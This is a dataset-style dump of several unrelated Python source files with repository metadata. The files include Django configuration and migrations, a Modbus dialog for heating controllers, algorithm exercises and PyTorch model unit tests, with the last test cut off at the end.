blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 2 616 | content_id stringlengths 40 40 | detected_licenses listlengths 0 69 | license_type stringclasses 2
values | repo_name stringlengths 5 118 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringlengths 4 63 | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 2.91k 686M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 23
values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 220
values | src_encoding stringclasses 30
values | language stringclasses 1
value | is_vendor bool 2
classes | is_generated bool 2
classes | length_bytes int64 2 10.3M | extension stringclasses 257
values | content stringlengths 2 10.3M | authors listlengths 1 1 | author_id stringlengths 0 212 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
750220a87bb360ef45473989010452b73e6dfdf0 | b5b4ab792f2b7b0eec33ed45868cf6fa91624e56 | /backend/my_phone/modules/shop/apps.py | 5b51582071a68f2d2cbfe0907290454e8ec05858 | [] | no_license | zch007/MyPhone | 90c6559976849a2f04cd94d6aed1ee1c20ba643f | aa1bd151df29d6c63f4deab49e6ba05ae5505d67 | refs/heads/master | 2023-05-05T02:29:31.738057 | 2021-05-16T15:50:01 | 2021-05-16T15:50:01 | 367,917,726 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 90 | py | from django.apps import AppConfig
class CourseConfig(AppConfig):
    # Django app configuration for the shop module.
    # NOTE(review): the class name says "Course" but the app is 'shop' — likely a
    # copy-paste leftover.  Renaming would require updating any INSTALLED_APPS /
    # apps.py references, so it is only flagged here.
    name = 'shop'
| [
"zzzch007@126.com"
] | zzzch007@126.com |
0858be05317e776041c88d31faa0a67e9714f19e | e3c2ca0b0ae27f4bdafb036487bdcb655a342c97 | /user/migrations/0002_auto_20210325_0818.py | 86b196c796883762b85b4a0d47ff4355a5feded9 | [] | no_license | ulaitorcodes/shenovate | b09eb2331854de8bc2cff15a44b4cbb14bd480e4 | 9152b43107c49e628b53ac8a22ddd606f8b60e5a | refs/heads/main | 2023-04-01T11:01:47.822609 | 2021-04-04T11:20:09 | 2021-04-04T11:20:09 | 345,303,921 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 811 | py | # Generated by Django 3.1.7 on 2021-03-25 08:18
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Auto-generated migration: create the MyUser profile model and drop Students."""
    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
        ('user', '0001_initial'),
    ]
    operations = [
        migrations.CreateModel(
            name='MyUser',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                # NOTE(review): 'phone' is declared as a DateField — it looks like it
                # should be a CharField; confirm before building on this schema.
                ('phone', models.DateField()),
                # Deleting the linked auth user cascades to this profile row.
                ('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
            ],
        ),
        migrations.DeleteModel(
            name='Students',
        ),
    ]
| [
"elijahekongofficial@gmail.com"
] | elijahekongofficial@gmail.com |
c956a1c3e002331a1a155784ad7f4f10d8e76e27 | 3686c8a7a491e7249b789166f91ff94fe95aff48 | /src/fakeformat/errors.py | 89bd5a6131fff6f2263c309d29e08020c4e4b7ac | [
"MIT"
] | permissive | roelandschoukens/fake-format-ml | 7a132acf4027abd6770f876534532d2f1a46e480 | 88ace75b300a5291a1536175cee47b7f44a1d3ef | refs/heads/master | 2021-06-08T11:44:36.045210 | 2021-05-18T09:17:27 | 2021-05-18T09:17:27 | 171,635,143 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 141 | py | class ParseException(Exception):
"""Base class for parsing exceptions"""
    def __init__(self, message):
        # Store the human-readable description for handlers.
        # NOTE(review): Exception.__init__ is not called, so str(exc) and
        # exc.args stay empty — confirm whether that is intended.
        self.message = message
| [
"roeland.schoukens@gmail.com"
] | roeland.schoukens@gmail.com |
fb8eec8a12cdb2614bc6751979dd044d5efc8fb1 | 143bd44f0f0dd3d7f012530689f25e25f594ba7d | /netshop/urls.py | 14965effdce42961569b0ee380d5fccf163c503b | [] | no_license | momentHappy/netshop | b2237215ad6267d46ac857f39c198f5678712145 | 60890481b6feae03669f7f68059ceef631d7dd0c | refs/heads/master | 2023-07-06T09:27:23.422142 | 2021-08-04T10:34:08 | 2021-08-04T10:34:08 | 392,647,390 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,126 | py | """netshop URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, re_path, include
from netshop.settings import DEBUG, MEDIA_ROOT
# Route table: admin plus the four feature apps; goods serves the site root.
urlpatterns = [
    path('admin/', admin.site.urls),
    path('', include('goods.urls')),
    path('user/', include('userapp.urls')),
    path('cart/', include('cart.urls')),
    path('order/', include('order.urls')),
]
if DEBUG:
    from django.views.static import serve
    # Serve uploaded media in development only.  The trailing comma makes the
    # right-hand side a tuple, which list += accepts.
    # NOTE(review): the pattern requires a trailing slash after the file path
    # (r'.../$') — confirm that is intended for media URLs.
    urlpatterns += re_path(r'^media/(?P<path>.*)/$', serve, {"document_root": MEDIA_ROOT}),
| [
"572836448@qq.com"
] | 572836448@qq.com |
dc57c185931f36ed5214e938dec7d582cbceacde | de43abb8a3d8b8e6e136b27c0928b14380ea9323 | /2021.06.16.(06).py | 58f07ff473f861a012d6bdc0fd8fb616f86eef1d | [] | no_license | ElaineLee21/Algorithm | 0d489aeb5d2faa47ba37fbe59d877aaccb776e37 | 28e927ac2f2be218ecab9d2010e321835ff32d2b | refs/heads/main | 2023-06-03T01:42:03.375029 | 2021-06-24T14:54:32 | 2021-06-24T14:54:32 | 378,149,901 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 466 | py | #백준 2609 하 정수론 및 조합론 - 최대공약수와 최소공배수
# My solution (refactored): use Euclid's algorithm via math.gcd instead of
# trial division over every candidate factor up to min(a, b).  The original
# also wrapped code in a try/except that could never fire (the while condition
# already guaranteed exact division).
# Reads two integers from stdin; prints the gcd and the lcm, one per line.
import math

a, b = map(int, input().split())
greatest = math.gcd(a, b)        # greatest common divisor, O(log min(a, b))
least = a * b // greatest        # lcm(a, b) * gcd(a, b) == a * b
print(greatest, least, sep='\n')
| [
"noreply@github.com"
] | ElaineLee21.noreply@github.com |
df0df4c01b8de92ac3eb93bc5001e8ac66cc275c | a3c9c1dba6852b4ea3a7a690c3043adf9706d736 | /HZRR_203/Software/RPi/Zentrale/ZZ0/alt/state30301104_1630_intermediate/move_to_desktop.monitor_on_boot/deprecated/hz_rr_dialog2.py | 42124fb3e1e8f45fb66857389fe893776d6a59cf | [] | no_license | peetsi/hr23 | 08d20b34685c789fd9bdd7d4116ad2c4389aece8 | 04e4aea87b3fc5fea3e8e5b24c910db0d6a801f2 | refs/heads/master | 2023-07-14T07:56:50.509944 | 2021-08-28T02:17:29 | 2021-08-28T02:17:29 | 388,883,361 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,114 | py | #!/usr/bin/python3
# -*- coding: utf-8 -*-
"""
HZ-RR012 RS485 dialog
Created on Sat Nov 19 10:35:52 2016
@author: Peter Loster (pl)
"""
import sys
import time
import numpy as np
import usb_ser as us
import modbus as mb
import param_11c as par_c
import param_11d as par_d
import heizkreis_config as hkr_cfg
#import RPi.GPIO as GPIO
# *** global variables
par = par_d                     # active parameter table (firmware version d)
err = 0
err |= us.serial_connect()      # open the RS485/USB serial link; OR-accumulate error bits
err |= us.ser_open()
print("Fehler=%d"%(err))
# *** preset values (default modAdr = 1)
reg = 0
intSec = 10 # interval in seconds between status polls
modAdr = 1  # currently addressed Modbus module
wdh = 300/intSec # repeat the status display for 5 minutes
vers = ['HZ-RR11c', 'HZ-RR11d']                    # known firmware versions
versTxt= ['(vom 12.12.2016)', '(vom 19.12.2016)']  # release dates shown in the menu
modFwVersion = vers[1]          # firmware version assumed for the module
def read_heizkreis_config() :
    """Load the heating-circuit configuration via hkr_cfg into module globals.

    Falls back to safe defaults when the returned tuple is too short.
    """
    global heizkreis, modules, modTVor, modSendTvor, dtLog, filtFakt
    h = hkr_cfg.get_heizkreis_config()
    if len(h) > 5:
        # assumes the tuple has exactly 6 fields — TODO confirm with hkr_cfg
        (heizkreis, modules, modTVor, modSendTvor, dtLog, filtFakt) = h
    else:
        # some default values
        heizkreis = 0
        modules = []
        modTVor = 0
        modSendTvor = []
        dtLog = 180 # time interval to log a data set
        filtFakt = 0.1
def menu(x):
    """Print the main menu and return the chosen command number.

    'a'/'A' maps to 99 (change module address), 'v'/'V' to 98 (select firmware
    version); any other entry must be an integer.  The original crashed with a
    ValueError on non-numeric input — it now re-prompts instead.
    *x* is unused and kept only for interface compatibility.
    """
    # x=0: show menu for selection
    print('Modul Adresse = %d; Firmware Version=%s'%(modAdr,modFwVersion))
    print(' 0 Ende')
    print(' A Modul Adresse V Modul Firmware Version')
    print(' 1 Teste Modul-Adresse (ping)')
    print(' 2 Staus: anzeigen; 3 alle %dsec anzeigen'%intSec)
    print(' 4 Parameter lesen 5 alle Param.-> Werkseinst.')
    print(' 6 Ventil dauerhaft auf 7 Ventil dauerhaft zu')
    print(' 8 Ventil regeln (Ende dauerhaft)')
    print(' 9 Regler inaktiv setzen 10 Regler aktiv setzen')
    print('11 schneller Ablauf fuer Test 12 normale Geschwindigkeit')
    print('20 sende Vorlauftemperatur von Zentrale')
    print('21 neue Parameter senden 31 alle Parameter ins EEPROM')
    print('39 neue Parameter an alle Module senden und ins EEPROM speichern')
    print('40 Parameter aller Module abholen und in Datei speichern')
    print(60*"-")
    print('Vorsicht: 49 Reset ueber Watchdog')
    print('Vorsicht: 50 jede Minute status abspeichern' )
    print('')
    while True:
        a = input('Wahl? ')
        if a=='a' or a=='A' :
            return 99
        if a=='v' or a=='V' :
            return 98
        try:
            return int(a)
        except ValueError:
            # invalid entry: ask again instead of crashing the program
            continue
def select_controller():
    """Interactively choose the target controller channel(s) on a module.

    Returns [1, 2, 3, 4] for 'all' (5), [reg] for a single choice
    (0 = whole module), or [] to cancel (9).  Non-numeric input is
    silently ignored and the question is asked again.
    """
    fertig = False
    while not fertig :
        a = input( 'module=0; regler=1,2,3,4; alle=5; Ende=9; wahl? ')
        try:
            reg = int(a)
            if reg == 5 :
                return[1,2,3,4]
            # NOTE(review): any value <= 4 (including negatives) is returned
            # as-is, and 6..8 fall through to re-prompt — confirm intended.
            elif reg <= 4 :
                return [reg]
            elif reg == 9 :
                return []
        except:
            pass
def perform_command( controllers, command ) :
    """Send Modbus *command* to each controller channel in *controllers*.

    Frames are addressed to the global modAdr; each request and its reply
    are echoed to the console.
    """
    for reg in controllers:
        cmd = mb.wrap_modbus( modAdr, command, reg, "" )
        print('sende: %s'%(cmd))
        rxCmd = us.txrx_command( cmd )
        print('empfange: %s'%( rxCmd ) )
def select_version() :
    """Ask the user which firmware version to assume; return its name.

    Also rebinds the global parameter table *par* to match the choice
    (1 -> par_c, 2 -> par_d).
    """
    global par
    global vers
    global versTxt
    i=0
    for ver in range( len(vers) ) :
        print('%d %s %s'%(i+1,vers[i],versTxt[i]))
        i += 1
    wahl=0
    # Loop until a number in 1..len(vers) was entered; anything else
    # (non-numeric, negative, too large) resets wahl to 0 and re-asks.
    while not wahl :
        a = input("Wahl ?")
        try:
            wahl = int(a)
        except:
            wahl = 0
            pass
        if wahl < 0 : wahl = 0
        if wahl > len(vers) : wahl = 0
    print('wahl=%d, version %s'%(wahl, vers[wahl-1]))
    if wahl == 1:
        par = par_c
    if wahl == 2:
        par = par_d
    return vers[wahl-1]
def doit( wahl ):
    """Execute menu command *wahl* by exchanging Modbus frames with the module.

    Uses module-level globals (modAdr, modFwVersion, par, modules, heizkreis,
    intSec, wdh) and the serial helpers in us/mb.  Side effects: serial
    traffic, console output and, for commands 40/50, log files on disk.
    """
    global modAdr
    global index
    global par
    global modFwVersion
    if wahl == 1 : # test module address (ping)
        err = us.ser_reset_buffer()
        txCmd = mb.wrap_modbus( modAdr, 1, 0, "" )
        print(txCmd)
        rxCmd = us.txrx_command( txCmd )
        print('empfange: %s'%( rxCmd ) )
    if wahl == 2 : # status: show once
        err = us.ser_reset_buffer()
        controllers = select_controller()
        perform_command( controllers, 0x02 )
    if wahl == 3 : # show status every intSec seconds (for wdh rounds)
        w = wdh
        while( w ) :
            for reg in [1,2,3,4]:
                txCmd = mb.wrap_modbus( modAdr, 2, reg, "" )
                print('sende: %s'%(txCmd))
                rxCmd = us.txrx_command( txCmd )
                print('empfange: %s'%( rxCmd ) )
            time.sleep(intSec)
            w -= 1
            print()
    if wahl == 4 : # read parameters of all four controllers plus the module
        tbl=[]
        for regler in [0,1,2,3,4]:
            txCmd = mb.wrap_modbus( modAdr, 3, regler, "" )
            print('sende: %s'%(txCmd))
            rxCmd = us.txrx_command( txCmd )
            cmdList = rxCmd
            print(rxCmd)
            tbl1 = cmdList.split()
            tbl.append( tbl1 )
        # transpose the replies so each parameter is printed as one table row
        spalten = len(tbl)
        zeilen = len(tbl[0])
        print(zeilen,spalten)
        for x in range(zeilen):
            zs=[]
            for y in range(spalten):
                zs.append(tbl[y][x])
            print("%10s %5s %5s %5s %5s"%(zs[0],zs[1],zs[2],zs[3],zs[4]))
    if wahl == 5 : # reset all parameters to factory defaults
        perform_command( [0], 0x30 )
    if wahl == 6 : # valve permanently open
        controllers = select_controller()
        perform_command( controllers, 0x31 )
    if wahl == 7 : # valve permanently closed
        controllers = select_controller()
        perform_command( controllers, 0x32 )
    if wahl == 8 : # regulate valve (leave permanent mode)
        controllers = select_controller()
        perform_command( controllers, 0x33 )
    if wahl == 9 : # set controller inactive
        controllers = select_controller()
        perform_command( controllers, 0x34 )
    if wahl == 10 : # controller active
        controllers = select_controller()
        perform_command( controllers, 0x35 )
    if wahl == 11 : # fast
        controllers = select_controller()
        perform_command( controllers, 0x36 )
    if wahl == 12 : # end fast -> normal speed
        controllers = select_controller()
        perform_command( controllers, 0x37 )
    if wahl == 20 : # send supply temperature from the control centre
        vtzstr = input("Zentrale Vorlauftemperatur:")
        cmd = mb.wrap_modbus( modAdr, 0x20, 0, ' '+vtzstr+' ' )
        print('sende: %s'%(cmd))
        rxCmd = us.txrx_command( cmd )
        print('empfange: %s'%( rxCmd ) )
    if wahl == 21 : # send new parameters to the selected controllers
        controllers = select_controller()
        for reg in controllers:
            cmd=modFwVersion
            for i in par.index:
                cmd += ' ' + par.valFst[i]%( par.valDef[i] )
            cmd += ' '
            txCmd = mb.wrap_modbus( modAdr, 0x21, reg, cmd )
            print( 'sende: %dbyte, cmd=%s'%(len(txCmd), txCmd ))
            rxCmd = us.txrx_command( txCmd )
            print('empfange: %s'%( rxCmd.strip() ) )
            dtEeprom = 0.2
            print('warte %d sec bis Befehl ausgeführt ist ...'%(dtEeprom))
            print("-"*40)
            time.sleep(dtEeprom)
    if wahl == 31 : # store parameters in EEPROM
        reg=0
        cmd = mb.wrap_modbus( modAdr, 0x39, reg, "" )
        print('sende: %s'%(cmd))
        rxCmd = us.txrx_command( cmd )
        print('empfange: %s'%( rxCmd ) )
    if wahl == 39 : # set parameters of ALL modules and store them in EEPROM
        print()
        print("-"*60)
        print('ACHTUNG: GROSSE AENDERUNG - LOG-Programm vorher beenden !!!')
        print("-"*60)
        antwort = input("wirklich durchführen? J/n :")
        if antwort == "J":
            # NOTE(review): the loop variable shadows the *global* modAdr, so the
            # globally selected module address is the last module afterwards.
            for modAdr in modules :
                for reg in [1,2,3,4] :
                    # build command
                    cmd=modFwVersion
                    for i in par.index:
                        cmd += ' ' + par.valFst[i]%( par.valDef[i] )
                    cmd += ' '
                    txCmd = mb.wrap_modbus( modAdr, 0x21, reg, cmd )
                    rxCmd = us.txrx_command( txCmd )
                    print('empfange: %s'%( rxCmd.strip() ) )
                    print("modul %d; Regler %d; "%(modAdr,reg), end="")
                    if "ACK" in rxCmd :
                        print("ACK")
                    else:
                        print("---")
                # commit to EEPROM
                dtEeprom = 1.5
                time.sleep(dtEeprom)
                reg=0
                cmd = mb.wrap_modbus( modAdr, 0x39, reg, "" )
                rxCmd = us.txrx_command( cmd )
                if "ACK" in rxCmd :
                    print(" EEPROM ACK")
                else:
                    print(" EEPROM --- Schreibfehler")
    if wahl == 40 : # fetch the parameters of all modules and save to a file
        dateTime = time.strftime( "%Y%m%d_%H%M%S", time.localtime())
        datName = "log/par_hk%d_%s.dat"%(heizkreis, dateTime)
        print("Schreibe Datei: %s"%(datName))
        fout = open(datName,"w")
        print("Modul:",end="")
        for moduleAdr in modules:
            print(moduleAdr," ", end="")
            for regler in [0,1,2,3,4]:
                txCmd = mb.wrap_modbus( moduleAdr, 3, regler, "" )
                rxCmd = us.txrx_command( txCmd )
                hs = "Mod%d Reg%d %s\r\n"%( moduleAdr, regler, rxCmd )
                fout.write(hs)
        print(" fertig")
        fout.close()
    if wahl == 49: # trigger a reset via the watchdog
        print('Modul Adresse ist %d'%(modAdr))
        cmd = mb.wrap_modbus( modAdr, 0x3A, 0, "" )
        print('sende: %s'%(cmd))
        rxCmd = us.txrx_command( cmd )
        print('empfange: %s'%( rxCmd ) )
    if wahl == 50: # read and store the status every minute (runs forever)
        print('Modul Adresse ist %d'%(modAdr))
        # BUG FIX: the strftime patterns used %M (minute) where the month %m was
        # clearly intended ("%Y-%M-%d" -> "%Y-%m-%d"); command 40 above already
        # used %m correctly.
        dateiName = 'log/log_HZ-RR012_'+time.strftime('%Y-%m-%d_%H:%M:%S.dat')
        odat = open( dateiName, 'w' )
        while True :
            for regler in [1,2,3,4]:
                txCmd = mb.wrap_modbus( modAdr, 2, regler, "" )
                rxCmd = us.txrx_command( txCmd )
                logstr = time.strftime('%Y-%m-%d_%H:%M:%S ') + rxCmd
                print('store: %s'%( logstr ) )
                odat.write( logstr + '\r\n' )
                odat.flush()
            time.sleep(60.0)
    if wahl == 98 : # select the firmware version to assume
        modFwVersion = select_version()
    if wahl == 99 : # change the addressed module (1..30)
        a=0
        while a<1 or a >31 :
            a = int( input( 'Modul Adresse 1..30; wahl? ') )
        modAdr = a
        print()
# Main loop: re-read the circuit config, show the menu and dispatch the chosen
# command until 0 ("Ende") is entered.
wahl = 1
while wahl > 0 :
    read_heizkreis_config()
    wahl = menu(0)
    print( "----------------wahl=%d-------------"%(wahl) )
    doit(wahl)
| [
"pl@loster.com"
] | pl@loster.com |
fed38d32e3c3d4c4c31ce116303ad6588a73d350 | 49cd488edb28d0433aaab9686e90ed90d134dd14 | /tests/test_generator.py | c422ffbb35a6f1b2df7ba62d732e99b0d49a368f | [
"MIT"
] | permissive | Dmdv/python-fibers | 349fab65a37475b2fee73bdc53960b1a289227bd | 20349077843033610864935e45977cf33d16a7e1 | refs/heads/master | 2021-01-15T20:53:34.925672 | 2013-08-06T21:19:08 | 2013-08-06T21:19:08 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,434 | py |
import sys
sys.path.insert(0, '../')
import unittest
import fibers
from fibers import Fiber
class genlet(Fiber):
    """A Fiber that behaves like a generator (see the generator() decorator).

    Iterating a genlet switches into its fiber; values come back via Yield().
    """
    def __init__(self, *args, **kwds):
        # Arguments for the wrapped function, applied when the fiber first runs.
        self.args = args
        self.kwds = kwds
        Fiber.__init__(self, target=self.run)
    def run(self):
        # fn is stored as a 1-tuple on the subclass so it stays a plain
        # attribute instead of being bound as a method.
        fn, = self.fn
        fn(*self.args, **self.kwds)
    def __iter__(self):
        return self
    def __next__(self):
        # Remember who is consuming us so Yield() can switch back, then run
        # the fiber until it yields or finishes.
        self.parent = fibers.current()
        result = self.switch()
        if self.is_alive():
            return result
        else:
            raise StopIteration
    # Hack: Python < 2.6 compatibility
    next = __next__
def Yield(value):
    """Yield *value* to the consumer of the nearest enclosing genlet.

    Walks up the fiber parent chain to find the genlet this code runs in and
    switches back to that genlet's consumer.  Raises RuntimeError when called
    outside any genlet.
    """
    g = fibers.current()
    while not isinstance(g, genlet):
        if g is None:
            raise RuntimeError('yield outside a genlet')
        g = g.parent
    g.parent.switch(value)
def generator(func):
    """Decorator: turn *func* (a function that calls Yield) into a genlet class.

    Calling the returned class creates an iterable that runs *func* in a fiber.
    """
    class generator(genlet):
        # 1-tuple so the function is stored as data, not bound as a method
        fn = (func,)
    return generator
# ____________________________________________________________
class GeneratorTests(unittest.TestCase):
    """Checks that fiber-based generators interleave with their consumer."""
    def test_generator(self):
        seen = []
        def g(n):
            for i in range(n):
                seen.append(i)
                Yield(i)
        g = generator(g)
        # Producer and consumer append alternately, so each value shows up twice.
        for k in range(3):
            for j in g(5):
                seen.append(j)
        self.assertEqual(seen, 3 * [0, 0, 1, 1, 2, 2, 3, 3, 4, 4])
# Allow running this test module directly.
if __name__ == '__main__':
    unittest.main(verbosity=2)
| [
"saghul@gmail.com"
] | saghul@gmail.com |
769b8ad326294ddf17b174be872d2a2885bdd24e | 0ee04869142ede700d9db2eec187a5e51761840c | /src/main/python/staircase.py | 4b6a435d05dd2553a451d5748c806e72f5619dbd | [
"Apache-2.0"
def number_of_ways(n):
    """Count the distinct ways to climb *n* stairs taking 1 or 2 steps at a time.

    Classic staircase ('Amazon') interview question; see
    https://youtu.be/5o-kdjv7FD0 for the problem statement.  Computed as the
    Fibonacci recurrence, iteratively, in O(n) time and O(1) space.
    """
    prev, curr = 1, 1
    for _ in range(n - 1):
        prev, curr = curr, prev + curr
    return curr
def number_of_ways_general(n, steps):
    """Count the ways to climb *n* stairs when each move is any size in *steps*.

    Generalised staircase ('Amazon') interview question; see
    https://youtu.be/5o-kdjv7FD0.  Bottom-up dynamic programming:
    ways[t] = sum of ways[t - s] over every allowed step s <= t,
    with ways[0] = 1 (the empty climb).  O(n * len(steps)) time.
    """
    ways = [1] + [0] * n
    for target in range(1, n + 1):
        ways[target] = sum(ways[target - s] for s in steps if s <= target)
    return ways[n]
if __name__ == '__main__':
    # Demo: the 1-or-2-step variant for n = 0..7, then the generalised
    # variant for several allowed step sets.  Output matches the original
    # hand-unrolled print statements line for line.
    for n in range(8):
        print(n, "==>", number_of_ways(n))
    print("********************")
    for steps in ({1, 2}, {1, 2, 5}, {1, 3, 5}):
        for n in range(8):
            print(n, ",", steps, "==>", number_of_ways_general(n, steps))
        print("********************")
"moh.noor94@gmail.com"
] | moh.noor94@gmail.com |
9fd3f088f8e72f894442977ddf10738898c0f0c3 | c66d37f197802cf14a687566fa7b92077c784f08 | /test/model/test_deep_learning_model_pt.py | cdc9f8afc98f69499187017dcdb8a12aa5071151 | [
"Apache-2.0"
] | permissive | yourLeilei/Sherpa.ai-Federated-Learning-Framework | a0a0d7ed8d0f1baa3c4e7703022b86a789e19e40 | 72f9e3b2ac2d282cbf3705ceb17223529102c8d8 | refs/heads/master | 2023-01-24T08:54:00.212810 | 2020-11-30T10:47:10 | 2020-11-30T10:47:10 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,400 | py | import numpy as np
from unittest.mock import Mock, patch, call
import pytest
from shfl.model.deep_learning_model_pt import DeepLearningModelPyTorch
class TestDeepLearningModel(DeepLearningModelPyTorch):
    """Minimal concrete subclass used to exercise the base class constructor."""
    def train(self, data, labels):
        pass
    def predict(self, data):
        pass
    def get_model_params(self):
        # Fake weights: a conv-like 4-D tensor plus a 10-way bias vector; the
        # constructor derives _data_shape/_labels_shape from these.
        return [np.random.rand(5, 1, 32, 32), np.random.rand(10, )]
    def set_model_params(self, params):
        pass
def test_deep_learning_model_private_data():
    """Constructor stores its collaborators and derives the data/label shapes."""
    criterion = Mock()
    optimizer = Mock()
    model = Mock()
    batch = 32
    epoch = 2
    metrics = [0, 1, 2, 3]
    device = 'device0'
    dpl = TestDeepLearningModel(model, criterion, optimizer, batch, epoch, metrics, device)
    assert dpl._model.id == model.id
    assert dpl._data_shape == 1
    assert dpl._labels_shape == (10,)
    assert dpl._criterion.id == criterion.id
    assert dpl._optimizer.id == optimizer.id
    assert dpl._batch_size == batch
    assert dpl._epochs == epoch
    assert np.array_equal(dpl._metrics, metrics)
    assert dpl._device == device
@patch('shfl.model.deep_learning_model_pt.DeepLearningModelPyTorch.get_model_params')
@patch('shfl.model.deep_learning_model_pt.torch')
@patch('shfl.model.deep_learning_model_pt.TensorDataset')
@patch('shfl.model.deep_learning_model_pt.DataLoader')
def test_pytorch_model_train(mock_dl, mock_tdt, mock_torch, mock_get_params):
    """train() drives optimizer, model and criterion in order for every epoch/batch."""
    criterion = Mock()
    optimizer = Mock()
    model = Mock()
    model_return = [1, 2, 3, 4, 5]
    model.return_value = model_return
    mock_get_params.return_value = [np.random.rand(5, 1, 24, 24), np.random.rand(10)]
    batch = 1
    epoch = 2
    metrics = None
    device = 'cpu'
    kdpm = DeepLearningModelPyTorch(model, criterion, optimizer, batch, epoch, metrics, device)
    num_data = 5
    data = np.array([np.random.rand(24, 24) for i in range(num_data)])
    data = np.reshape(data, (data.shape[0], 1, data.shape[1], data.shape[2]))
    labels = np.array([np.zeros(10) for i in range(num_data)])
    for l in labels:
        l[np.random.randint(0, len(l))] = 1
    # Fake DataLoader batches: mocks whose .float().to(...) returns the array.
    element = []
    for el, la in zip(data, labels):
        x = Mock()
        x.float().to.return_value = el[np.newaxis]
        y = Mock()
        y.float().to.return_value = la[np.newaxis]
        element.append([x, y])
    mock_dl.return_value = element
    kdpm.train(data, labels)
    # Rebuild the expected call sequences for all epochs and batches.
    optimizer_calls = []
    model_calls = []
    criterion_calls = []
    for i in range(epoch):
        for elem in element:
            inputs, y_true = elem[0].float().to(), elem[1].float().to()
            optimizer_calls.extend([call.zero_grad(), call.step()])
            model_calls.extend([call(inputs), call.zero_grad()])
            criterion_calls.extend([call(model_return, mock_torch.argmax(y_true, -1)), call().backward()])
    kdpm._optimizer.assert_has_calls(optimizer_calls)
    kdpm._model.assert_has_calls(model_calls)
    kdpm._criterion.assert_has_calls(criterion_calls)
@patch('shfl.model.deep_learning_model_pt.DeepLearningModelPyTorch.get_model_params')
@patch('shfl.model.deep_learning_model_pt.torch')
@patch('shfl.model.deep_learning_model_pt.TensorDataset')
@patch('shfl.model.deep_learning_model_pt.DataLoader')
def test_predict(mock_dl, mock_tdt, mock_torch, mock_get_params):
    """predict() runs the model per batch and concatenates the numpy outputs."""
    criterion = Mock()
    optimizer = Mock()
    model = Mock()
    model_return = Mock()
    model_return.cpu().numpy.return_value = [1, 2, 3, 4]
    model.return_value = model_return
    mock_get_params.return_value = [np.random.rand(5, 1, 24, 24), np.random.rand(10)]
    batch = 32
    epoch = 1
    metrics = None
    device = 'cpu'
    kdpm = DeepLearningModelPyTorch(model, criterion, optimizer, batch, epoch, metrics, device)
    num_data = 5
    data = np.array([np.random.rand(24, 24) for i in range(num_data)])
    data = np.reshape(data, (data.shape[0], 1, data.shape[1], data.shape[2]))
    element = []
    for el in data:
        x = Mock()
        x.float().to.return_value = el[np.newaxis]
        element.append([x, -1])
    mock_dl.return_value = element
    y_pred_return = kdpm.predict(data)
    # Expected: one model call per batch, its output moved to cpu and to numpy.
    model_calls = []
    res = []
    for elem in element:
        inputs = elem[0].float().to()
        model_calls.extend([call(inputs), call(inputs).cpu(), call(inputs).cpu().numpy()])
        res.extend(model_return.cpu().numpy.return_value)
    kdpm._model.assert_has_calls(model_calls)
    assert np.array_equal(res, y_pred_return)
def side_effect_from_numpy(value):
    """Stand-in for torch.from_numpy: a mock whose .float() returns *value*."""
    stub = Mock()
    stub.float.return_value = value
    return stub
def side_effect_argmax(value, axis):
    """Identity stand-in for torch.argmax: returns *value* and ignores *axis*."""
    return value
@patch('shfl.model.deep_learning_model_pt.DeepLearningModelPyTorch.predict')
@patch('shfl.model.deep_learning_model_pt.DeepLearningModelPyTorch.get_model_params')
@patch('shfl.model.deep_learning_model_pt.torch')
def test_evaluate(mock_torch, mock_get_params, mock_predict):
    """evaluate() returns [loss] followed by each custom metric's value."""
    num_data = 5
    criterion = Mock()
    optimizer = Mock()
    criterion.return_value = np.float64(0.0)
    model = Mock()
    # Make the patched torch helpers pass values through unchanged.
    mock_torch.argmax.side_effect = side_effect_argmax
    mock_torch.from_numpy.side_effect = side_effect_from_numpy
    predict_return = Mock()
    predict_return.cpu().numpy.return_value = np.random.rand(5, 10)
    mock_predict.return_value = predict_return
    mock_get_params.return_value = [np.random.rand(num_data, 1, 24, 24), np.random.rand(10)]
    batch = 32
    epoch = 2
    metrics = {'aux': lambda x, y: -1}
    device = 'cpu'
    kdpm = DeepLearningModelPyTorch(model, criterion, optimizer, batch, epoch, metrics, device)
    data = np.array([np.random.rand(24, 24) for i in range(num_data)])
    data = np.reshape(data, (data.shape[0], 1, data.shape[1], data.shape[2]))
    labels = np.array([np.zeros(10) for i in range(num_data)])
    for l in labels:
        l[np.random.randint(0, len(l))] = 1
    res_metrics = kdpm.evaluate(data, labels)
    mock_predict.assert_called_once_with(data)
    kdpm._criterion.assert_called_once_with(mock_predict.return_value, labels)
    assert np.array_equal([0, -1], res_metrics)
@patch('shfl.model.deep_learning_model_pt.DeepLearningModelPyTorch.evaluate')
@patch('shfl.model.deep_learning_model_pt.DeepLearningModelPyTorch.get_model_params')
def test_performance(mock_get_params, mock_evaluate):
    """performance() delegates to evaluate() and returns its first metric."""
